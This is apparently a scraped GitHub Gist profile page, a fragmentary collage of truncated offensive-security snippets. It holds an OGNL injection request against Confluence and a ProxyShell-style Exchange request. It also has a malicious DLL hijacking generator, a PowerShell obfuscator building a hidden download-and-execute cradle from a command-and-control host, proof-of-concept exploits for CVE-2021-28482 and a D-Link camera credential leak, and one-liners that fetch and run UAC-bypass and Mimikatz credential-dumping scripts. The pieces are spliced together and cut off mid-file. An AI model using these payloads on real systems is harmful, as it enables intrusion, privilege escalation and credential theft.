
lulz Udyz

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: local.confluence
User-Agent: curl/7.68.0
Accept: */*
<?xml version="1.0" encoding="utf-16"?>
<Answers Version="1.0">
<Interaction ID="IT_RebrowseForFile">
<Value>?</Value>
</Interaction>
<Interaction ID="IT_LaunchMethod">
<Value>ContextMenu</Value>
</Interaction>
<Interaction ID="IT_SelectProgram">
<Value>NotListed</Value>
@Udyz
Udyz / evilldll-gen.sh
Created October 4, 2021 01:01 — forked from klezVirus/evilldll-gen.sh
Simple Malicious DLL Generator for DLL Hijacking Attacks
#!/bin/sh
usage(){
echo "# ################# Simple CPP to DLL Utility ################# #"
echo "# This tool has been made to easily generate and compile a DLL to be used for DLL hijacking.#"
echo "# #"
echo "# ========================================================================================== #"
echo "# #"
echo "# Usage: #"
echo "# ./dll-gcc [Options] <input-file> #"
POST /autodiscover/autodiscover.json?@evil.corp/EWS/Exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp HTTP/2
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: */*
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
@Udyz
Udyz / cb-random.py
Last active April 14, 2024 14:39
VBA Powershell Bypass
import random
def cmd(string):
    for _ in string:
        _ = _.replace("'", '\"')
        _ = _.replace('"', '\"')
        s = random.choice(["'"+_.lower()+"'+", "'"+_.upper()+"'+"]).replace(")'+", ")'")
        print(s, end='')
cmd("powershell.exe nop -wind hidden -Exec Bypass -noni -enc -C IeX (NeW-OBjeCt Net.WeBClIeNt).DownloadString('hxxp://c2.cobaltstrike.com/Malicious')")
POST /api/Action/TestAction HTTP/1.1
Host: <target>
Content-Length: 3978
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: <token>
X-Requested-With: XMLHttpRequest
ViewLimitationID: 0
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Cookie: <cookie>
@Udyz
Udyz / PoC_CVE-2021-28482.py
Created May 2, 2021 11:46 — forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
@Udyz
Udyz / DCS-2530L Leaked admin
Created April 18, 2021 18:25
CVE-2020-25078.py
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import sys
def exploit(url):
    vuln = url + '/config/getuser?index=0'
    r = requests.get(vuln, verify=False, timeout=5)
    if r.status_code == 200 and 'priv=1' in r.text:
        user = r.text.split('name=')[1].split('\r\npass')[0]
        pwd = r.text.split('\r\npass=')[1].split('\r\npriv')[0]
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands